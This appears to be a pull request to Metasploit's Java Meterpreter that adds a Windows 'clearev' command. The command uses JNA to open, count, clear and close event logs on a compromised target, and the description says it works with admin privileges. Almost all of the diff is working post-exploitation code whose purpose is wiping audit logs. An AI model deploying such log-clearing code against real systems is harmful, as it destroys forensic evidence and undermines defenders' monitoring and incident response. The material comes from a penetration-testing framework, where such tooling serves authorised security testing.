### PR TITLE
Add clearev command on Windows using JNA

### DIFF
--- a/java/meterpreter/meterpreter/pom.xml
+++ b/java/meterpreter/meterpreter/pom.xml
@@ -41,6 +41,7 @@
 							<artifactSet>
 								<includes>
 									<include>com.metasploit:Metasploit-Java-Shared</include>
+									<include>net.java.dev.jna:jna</include>
 								</includes>
 							</artifactSet>
 						</configuration>

--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/command/NotYetImplementedCommand.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/command/NotYetImplementedCommand.java
@@ -131,9 +131,6 @@ public class NotYetImplementedCommand implements Command {
         typeNames.put(new Integer(TLVType.TLV_TYPE_IDLE_TIME), "TLV_TYPE_IDLE_TIME");
         typeNames.put(new Integer(TLVType.TLV_TYPE_KEYS_DUMP), "TLV_TYPE_KEYS_DUMP");
         typeNames.put(new Integer(TLVType.TLV_TYPE_DESKTOP), "TLV_TYPE_DESKTOP");
-        typeNames.put(new Integer(TLVType.TLV_TYPE_EVENT_SOURCENAME), "TLV_TYPE_EVENT_SOURCENAME");
-        typeNames.put(new Integer(TLVType.TLV_TYPE_EVENT_HANDLE), "TLV_TYPE_EVENT_HANDLE");
-        typeNames.put(new Integer(TLVType.TLV_TYPE_EVENT_NUMRECORDS), "TLV_TYPE_EVENT_NUMRECORDS");
         typeNames.put(new Integer(TLVType.TLV_TYPE_EVENT_READFLAGS), "TLV_TYPE_EVENT_READFLAGS");
         typeNames.put(new Integer(TLVType.TLV_TYPE_EVENT_RECORDOFFSET), "TLV_TYPE_EVENT_RECORDOFFSET");
         typeNames.put(new Integer(TLVType.TLV_TYPE_EVENT_RECORDNUMBER), "TLV_TYPE_EVENT_RECORDNUMBER");

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/Loader.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/Loader.java
@@ -72,5 +72,9 @@ public class Loader implements ExtensionLoader {
         mgr.registerCommand(CommandId.STDAPI_UI_SEND_KEYEVENT, stdapi_ui_send_keyevent.class, V1_4);
         mgr.registerCommand(CommandId.STDAPI_WEBCAM_AUDIO_RECORD, stdapi_webcam_audio_record.class, V1_4);
         mgr.registerCommand(CommandId.STDAPI_SYS_PROCESS_GETPID, stdapi_sys_process_getpid.class, V1_5, V1_9);
+        mgr.registerCommand(CommandId.STDAPI_SYS_EVENTLOG_OPEN, stdapi_sys_eventlog_open.class);
+        mgr.registerCommand(CommandId.STDAPI_SYS_EVENTLOG_CLOSE, stdapi_sys_eventlog_close.class);
+        mgr.registerCommand(CommandId.STDAPI_SYS_EVENTLOG_CLEAR, stdapi_sys_eventlog_clear.class);
+        mgr.registerCommand(CommandId.STDAPI_SYS_EVENTLOG_NUMRECORDS, stdapi_sys_eventlog_numrecords.class);
     }
 }

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog.java
@@ -1,0 +1,28 @@
+package com.metasploit.meterpreter.stdapi;
+
+import com.sun.jna.Library;
+import com.sun.jna.Native;
+import com.sun.jna.Pointer;
+import com.sun.jna.Platform;
+import com.sun.jna.ptr.IntByReference;
+
+import com.sun.jna.win32.W32APIOptions;
+
+// Empty dummy class
+public class stdapi_sys_eventlog {
+    interface Libraries extends Library {
+        // Native.loadLibrary is deprecated
+        stdapi_sys_eventlog.Libraries AdvAPILibrary = Native.load(
+                (Platform.isWindows() ? "Advapi32" : "THIS SHOULD NEVER BE CALLED."), stdapi_sys_eventlog.Libraries.class, W32APIOptions.DEFAULT_OPTIONS);
+        Pointer OpenEventLog(String lpUNCServerName, String lpSourceName);
+        // Close an event log
+        Boolean CloseEventLog(Pointer hEventLog);
+        // Clear an event log
+        Boolean ClearEventLog(Pointer hEventLog, String lpBackupFileName);
+        Boolean GetNumberOfEventLogRecords(Pointer hEventLog, IntByReference NumberOfRecords);
+
+        stdapi_sys_eventlog.Libraries Kernel32Library = Native.load(
+                (Platform.isWindows() ? "Kernel32.dll" : "THIS SHOULD NEVER BE CALLED."), stdapi_sys_eventlog.Libraries.class, W32APIOptions.DEFAULT_OPTIONS);
+        Integer GetLastError();
+    }
+}

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog.java
@@ -10,19 +10,21 @@ import com.sun.jna.win32.W32APIOptions;
 
 // Empty dummy class
 public class stdapi_sys_eventlog {
-    interface Libraries extends Library {
-        // Native.loadLibrary is deprecated
-        stdapi_sys_eventlog.Libraries AdvAPILibrary = Native.load(
-                (Platform.isWindows() ? "Advapi32" : "THIS SHOULD NEVER BE CALLED."), stdapi_sys_eventlog.Libraries.class, W32APIOptions.DEFAULT_OPTIONS);
+    interface AdvAPILibrary extends Library {
+        AdvAPILibrary INSTANCE = Native.load(
+                (Platform.isWindows() ? "Advapi32" : "THIS SHOULD NEVER BE CALLED."), AdvAPILibrary.class, W32APIOptions.DEFAULT_OPTIONS);
+
         Pointer OpenEventLog(String lpUNCServerName, String lpSourceName);
         // Close an event log
         Boolean CloseEventLog(Pointer hEventLog);
         // Clear an event log
         Boolean ClearEventLog(Pointer hEventLog, String lpBackupFileName);
         Boolean GetNumberOfEventLogRecords(Pointer hEventLog, IntByReference NumberOfRecords);
+    }
 
-        stdapi_sys_eventlog.Libraries Kernel32Library = Native.load(
-                (Platform.isWindows() ? "Kernel32.dll" : "THIS SHOULD NEVER BE CALLED."), stdapi_sys_eventlog.Libraries.class, W32APIOptions.DEFAULT_OPTIONS);
+    interface Kernel32Library extends Library {
+        Kernel32Library INSTANCE = Native.load(
+                (Platform.isWindows() ? "Kernel32" : "THIS SHOULD NEVER BE CALLED."), Kernel32Library.class, W32APIOptions.DEFAULT_OPTIONS);
         Integer GetLastError();
     }
 }

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog_clear.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog_clear.java
@@ -12,13 +12,12 @@ public class stdapi_sys_eventlog_clear extends stdapi_sys_eventlog implements Co
         try
         {
             Pointer handle = Pointer.createConstant(request.getLongValue(TLVType.TLV_TYPE_EVENT_HANDLE));
-            Boolean success = Libraries.AdvAPILibrary.ClearEventLog(handle, null);
+            Boolean success = AdvAPILibrary.INSTANCE.ClearEventLog(handle, null);
             if (!success)
             {
-                Integer error = Libraries.Kernel32Library.GetLastError();
-                return error;
+                return Kernel32Library.INSTANCE.GetLastError();
             }
-            Libraries.AdvAPILibrary.CloseEventLog(handle);
+            AdvAPILibrary.INSTANCE.CloseEventLog(handle);
             return ERROR_SUCCESS;
         }
         catch (Throwable e)

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog_clear.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog_clear.java
@@ -1,0 +1,29 @@
+package com.metasploit.meterpreter.stdapi;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+import com.sun.jna.Pointer;
+
+public class stdapi_sys_eventlog_clear extends stdapi_sys_eventlog implements Command {
+    @Override
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        try
+        {
+            Pointer handle = Pointer.createConstant(request.getLongValue(TLVType.TLV_TYPE_EVENT_HANDLE));
+            Boolean success = Libraries.AdvAPILibrary.ClearEventLog(handle, null);
+            if (!success)
+            {
+                Integer error = Libraries.Kernel32Library.GetLastError();
+                return error;
+            }
+            Libraries.AdvAPILibrary.CloseEventLog(handle);
+            return ERROR_SUCCESS;
+        }
+        catch (Throwable e)
+        {
+            return ERROR_FAILURE;
+        }
+    }
+}

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog_close.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog_close.java
@@ -12,7 +12,7 @@ public class stdapi_sys_eventlog_close extends stdapi_sys_eventlog implements Co
         try
         {
             Pointer handle = Pointer.createConstant(request.getLongValue(TLVType.TLV_TYPE_EVENT_HANDLE));
-            Libraries.AdvAPILibrary.CloseEventLog(handle);
+            AdvAPILibrary.INSTANCE.CloseEventLog(handle);
             return ERROR_SUCCESS;
         }
         catch (Throwable e)

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog_close.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog_close.java
@@ -1,0 +1,23 @@
+package com.metasploit.meterpreter.stdapi;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+import com.sun.jna.Pointer;
+
+public class stdapi_sys_eventlog_close extends stdapi_sys_eventlog implements Command {
+    @Override
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        try
+        {
+            Pointer handle = Pointer.createConstant(request.getLongValue(TLVType.TLV_TYPE_EVENT_HANDLE));
+            Libraries.AdvAPILibrary.CloseEventLog(handle);
+            return ERROR_SUCCESS;
+        }
+        catch (Throwable e)
+        {
+            return ERROR_FAILURE;
+        }
+    }
+}

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog_numrecords.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog_numrecords.java
@@ -1,0 +1,26 @@
+package com.metasploit.meterpreter.stdapi;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+import com.sun.jna.Pointer;
+import com.sun.jna.ptr.IntByReference;
+
+public class stdapi_sys_eventlog_numrecords extends stdapi_sys_eventlog implements Command {
+    @Override
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        try
+        {
+            Pointer handle = Pointer.createConstant(request.getLongValue(TLVType.TLV_TYPE_EVENT_HANDLE));
+            IntByReference numberOfRecords = new IntByReference();
+            Libraries.AdvAPILibrary.GetNumberOfEventLogRecords(handle, numberOfRecords);
+            response.add(TLVType.TLV_TYPE_EVENT_NUMRECORDS, numberOfRecords.getValue());
+            return ERROR_SUCCESS;
+        }
+        catch (Throwable e)
+        {
+            return ERROR_FAILURE;
+        }
+    }
+}

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog_numrecords.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog_numrecords.java
@@ -14,7 +14,7 @@ public class stdapi_sys_eventlog_numrecords extends stdapi_sys_eventlog implemen
         {
             Pointer handle = Pointer.createConstant(request.getLongValue(TLVType.TLV_TYPE_EVENT_HANDLE));
             IntByReference numberOfRecords = new IntByReference();
-            Libraries.AdvAPILibrary.GetNumberOfEventLogRecords(handle, numberOfRecords);
+            AdvAPILibrary.INSTANCE.GetNumberOfEventLogRecords(handle, numberOfRecords);
             response.add(TLVType.TLV_TYPE_EVENT_NUMRECORDS, numberOfRecords.getValue());
             return ERROR_SUCCESS;
         }

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog_open.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog_open.java
@@ -1,0 +1,28 @@
+package com.metasploit.meterpreter.stdapi;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+import com.sun.jna.Pointer;
+
+public class stdapi_sys_eventlog_open extends stdapi_sys_eventlog implements Command {
+    @Override
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        String sourceName = request.getStringValue(TLVType.TLV_TYPE_EVENT_SOURCENAME);
+
+        try
+        {
+            // Make sure that we are using the correct (String or WString) type here, or we do not get correct results.
+            Pointer handle = Libraries.AdvAPILibrary.OpenEventLog(null, sourceName);
+            // Remember to cast the native value to Pointer later.
+            response.add(TLVType.TLV_TYPE_EVENT_HANDLE, Pointer.nativeValue(handle));
+            return ERROR_SUCCESS;
+        }
+        catch (Throwable e)
+        {
+            return ERROR_FAILURE;
+        }
+    }
+}

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog_open.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_eventlog_open.java
@@ -15,7 +15,7 @@ public class stdapi_sys_eventlog_open extends stdapi_sys_eventlog implements Com
         try
         {
             // Make sure that we are using the correct (String or WString) type here, or we do not get correct results.
-            Pointer handle = Libraries.AdvAPILibrary.OpenEventLog(null, sourceName);
+            Pointer handle = AdvAPILibrary.INSTANCE.OpenEventLog(null, sourceName);
             // Remember to cast the native value to Pointer later.
             response.add(TLVType.TLV_TYPE_EVENT_HANDLE, Pointer.nativeValue(handle));
             return ERROR_SUCCESS;

--- a/java/pom.xml
+++ b/java/pom.xml
@@ -18,6 +18,12 @@
 			<version>4.13.1</version>
 			<scope>test</scope>
 		</dependency>
+		<!-- https://mvnrepository.com/artifact/net.java.dev.jna/jna -->
+		<dependency>
+			<groupId>net.java.dev.jna</groupId>
+			<artifactId>jna</artifactId>
+			<version>5.10.0</version>
+		</dependency>
 	</dependencies>
 	<build>
 		<plugins>


### PR DESCRIPTION
This PR uses JNA to add the `clearev` command against a Windows target.
To successfully delete the event logs, the payload needs to have admin privs otherwise we get error code 5.
As of right now, the resulting `meterpreter.jar` that is being sent to the target has massively increased in size: it went from `Sending stage (58376 bytes)` to about `Sending stage (1812903 bytes)` as I am including the full JNA library instead of just the jars we need for Windows.